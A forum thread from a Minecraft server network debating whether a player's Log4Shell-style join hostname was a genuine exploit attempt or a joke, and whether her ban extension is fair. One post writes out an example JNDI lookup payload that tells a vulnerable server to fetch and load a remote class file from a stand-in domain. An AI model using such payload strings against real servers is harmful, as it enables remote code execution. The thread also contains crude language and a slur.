eva67x - Indef Ban Notification

  • Further to previous threads.

    Due to the attempt to exploit the Log4J exploit (albeit in a stupid way that could cause no damage), eva67x's existing Indef Ban is hereby extended to 6 months.

    UUID - 4d708f0c-cb2a-4a1e-928f-214daccc9d18


    Wild1145

    Network Owner at TotalFreedom

    Managing Director at ATLAS Media Group Ltd.

    Founder & Owner at MastodonApp.UK

  • I would actually like to challenge this decision to extend the ban. I do not agree that this was actually an attempt to exploit Log4Shell, and I firmly believe this was intended to be a joke about a well-known exploit and not an actual attempt to cause any harm to the server whatsoever. Before I can explain my viewpoint, I'd like to clear some things up first.

    Note: Many of these are things that Eva likely already knows about because she has experience coding in Java, Minecraft (along with its protocols), and computers in general.

    How Log4Shell Worked

    Log4Shell abused a galaxy brain decision by the developers of Log4J where they thought it was a brilliant idea to allow people to query URLs as strings and then load whatever data that comes up as Java code. A typical payload would look something like this:

    Code
    ${jndi:ldap://johnson.cant-stop-dropping-sh.it/MyCockIsBiggerThanYours.class}

    In this example, a vulnerable server would then download whatever is at http://johnson.cant-stop-dropping-sh.it/MyCockIsBiggerThanYours.class and then load it into memory as native Java code. For the payload to work, you need to specify a link that contains either a valid domain or a valid numerical IP address (with all sets of numbers being a number from 0 to 255). Keep this in mind when reading the rest of this post.

    About domains

    Domains essentially route human-friendly text like totalfreedom.me to IP addresses. All public domains are required to have what's called a TLD (Top Level Domain) in order to work. While private domains do not have this restriction and can be things like "cockstapler", a vulnerable server needs to firstly be configured to know what the fuck "cockstapler" is, which cannot be done from the outside world without someone breaching whatever DNS server the network relies on.

    Why it wouldn't work

    Now that we've gotten the technical explanations out of the way, let's talk about why the string Ryan cites as an attempt to exploit Log4J wouldn't work. For reference, here's the string itself:

    Code
    ${jdni:ldap://get_balls}
    • The domain the string links to, "get_balls", is not a valid public domain name
      It lacks a Top Level Domain, and because an attacker would absolutely need to use a public domain (which would require one) to abuse the vulnerability, this flat out wouldn't work even if we were vulnerable to Log4Shell because the server wouldn't be able to reach whatever is at get_balls.
    • Nothing in our infrastructure at the time of the incident was even remotely affected by Log4Shell
      Log4Shell had been patched 4 months earlier by Log4J's development team, and Mojang (along with the developers of Paper, Fabric, Forge, etc) had quite literally pushed out an update for every version of Minecraft they supported to use the version of Log4J with the patch. By the time we updated Paper to 1.17, Paper had already pushed a patch for that particular version as well. In addition, BungeeCord (the proxy software we use that connects all of the servers together in the network) doesn't even use Log4J at all, so the proxy was basically immune to the exploit right from the get-go.
    • Nothing in our infrastructure at the time of the incident ever used Log4J to log the domain name/IP address used to join the network
      The only things that log that kind of information (namely, NetworkManager and Plan) do it in a way that does not use Log4J at all. They simply take whatever string was used, process it, and then send it to a database using some shit like MySQL. Besides, it would be incredibly pointless to log that kind of information to the server logs in the first place.

    Why I believe it's a joke

    Given the fact that the vulnerability had been patched 4 months prior to the incident and she used a string that linked to an invalid domain that was quite literally a balls joke (something she has made many many times before) and very obviously wouldn't work for the reasons above, I am inclined to believe she did not in fact attempt to exploit the vulnerability but rather was joking about the vulnerability itself. Why would she even attempt to abuse a vulnerability when she knows it would very obviously not work?


  • The reality is they tried to push an exploit onto the server, they had no idea if it had been patched or not, and it could have caused major issues. The reality is this was one of the worst offenders of abusing this system; this is the full list of every invalid hostname they tried to join with that I then had to clean up.

  • they tried to push an exploit onto the server

    You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.

    they had no idea if it had been patched or not

    How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.

    it could have caused major issues

    How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.


  • How do you know this?

    What eva has said multiple times, here in detail:

    I connected with this address on the 12/13th of April 2022 (Same dates I was joining with made-up addresses) and the log4shell CVE was discovered and reported to Apache on the 24th of November 2021 and patched on the 9th of December 2021 (5 months before I connected with made-up addresses) which means that by this date it was patched and is no longer a CVE or exploit

    TotalFreedom's Executive Community & Marketing Manager

  • You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.

    But she did; if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network. If it was a "Joke" it sure as fuck wasn't a funny one.


    How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.

    Because our patch status isn't public knowledge, nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.


    How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.

    Most of our infrastructure did have a Log4J component that could have been exploited; we had to put steps in place to ensure it couldn't be. The URL string could indeed have been valid / resolved to something, again due to how Java operates and how some Java libraries will parse it for DNS resolution.

    The bottom line is when people attempt to exploit anything on the network, they're banned. Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and the number of connections made; it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.

    Wild1145


  • But she did, if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network.

    But as noted below, it absolutely couldn't, and Eva knows this for a fact. Also, what does "if the right set of circumstances were met" mean? That string would only have worked if each of these spectacular blunders happened:

    • [Network-level] BungeeCord using Log4J at all for its logging (it simply doesn't)
    • Us running a version of Paper/Scissors that was still vulnerable to the exploit (we didn't because that would be fucking suicide)
    • Us for some reason deciding to actually manually resolve the domain get_balls to somewhere that hosted malicious class files (we don't, because that would be retarded) OR manually configure our shit to append .com to the end of domains that fail to resolve (we didn't and still don't, because that's absolutely pointless)
    • Us using something that uses Log4J specifically to log the IP address used by players to join the server (we don't)

    Classifying what Eva did as a deliberate attempt to harm the server requires you to prove that it would have actually worked in the default configuration for a Minecraft server, in our configuration, and in a reasonable configuration for a server like ours. In all 3 configurations, the string just simply could not work. I strongly believe she was only merely joking about the exploit itself given her knowledge on Java, its various libraries, and how they tick.

    Because our patch status isn't public knowledge

    Except it is public knowledge. Anyone can go to the GitHub repository for Paper (or in our case, Scissors) and compare the commit versions with what is on the server using /ver. Even then that doesn't even matter, because common sense takes place in the absence of public knowledge. Given the severity of Log4Shell where a single string could give you the keys to the mansion, it would be common sense for whoever was managing a vulnerable service to immediately patch the issue upon hearing about it. Eva, along with literally anyone else, would have assumed that we did the same thing already since it had been four months since that nuclear bomb of an exploit had dropped.

    nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.

    I disagree. I think she would understand it quite well. The exploit was a design flaw in the Log4J library itself and no other libraries actually had this issue. I can confidently say that nothing that gathered that kind of information would have been affected by this exploit at all.

    Most of our infrastructure did have a log4J component that could have been exploited, we had to put steps in place to ensure it couldn't be.

    Wait, what? Where, when, and how? I would have expected us to have discovered and patched this back in December of 2021.

    The URL String could indeed have been valid / resolved to something again due to how Java operates and how some Java libraries will parse it for DNS resolution.

    (Just to note, Ryan further detailed what he meant at the end with "due to how Java operates and how some Java libraries will parse it" in a set of Discord messages from October 20, 2022, which I've included below.)

    FYI [...] in Java and a lot of other software if the DNS resolution fails it'll suffix .com to the hostname in the lookup. I know because I've triggered a lot of alarms on networks being monitored when we've had DNS leaks / misconfigured things.

    So the reality is "${jndi:ldap://get_balls}" on the network would have resolved in a lot of cases to "${jndi:ldap://get_balls.com}"

    It wouldn't - I actually tested whether the domain "get_balls" would actually resolve to anywhere valid by deploying the string from the provided evidence to a local test server running a vulnerable version of Log4J. It attempted to resolve get_balls and obviously failed. However, it did not attempt to resolve any other domain, and this is evident from the fact that it didn't throw an error about a "get_balls.com" not resolving properly despite the fact that the domain doesn't exist. You can see the results below:


    The bottom line is when people attempt to exploit anything on the network, they're banned.

    When did I say I was challenging the initial ban? I was challenging your decision to extend Eva's ban from 2 months to 6 months because you backed said decision up by claiming she both maliciously and intentionally tried to abuse a critically dangerous remote code execution exploit with the idea being to disrupt the network or a server within it, which doesn't make sense given a wide variety of reasons which I have previously stated.

    Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and number of connections made, it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.

    Actually, that would have actually been a much better justification than what you went with.


  • Actually, that would have actually been a much better justification than what you went with.

    fwiw this isn’t the first instance ryan said this like he’s been saying that from the start but just mainly on Discord

    my two cents is that we really need to start cutting down on the long term bans for regular users… to the point where it’s becoming an issue for the playercount. i’ve never been one to complain about shit like that cuz yk being an admin for 5 years I understand the need for bans and shit but when its extending a ban from 2 to 6 months for something that sure is bannable but not like critically serious, i start to question shit

    think of the knock on effect too.. if people start to worry everything is bannable then they wont join - especially since from eva’s pov it was just a joke gone wrong
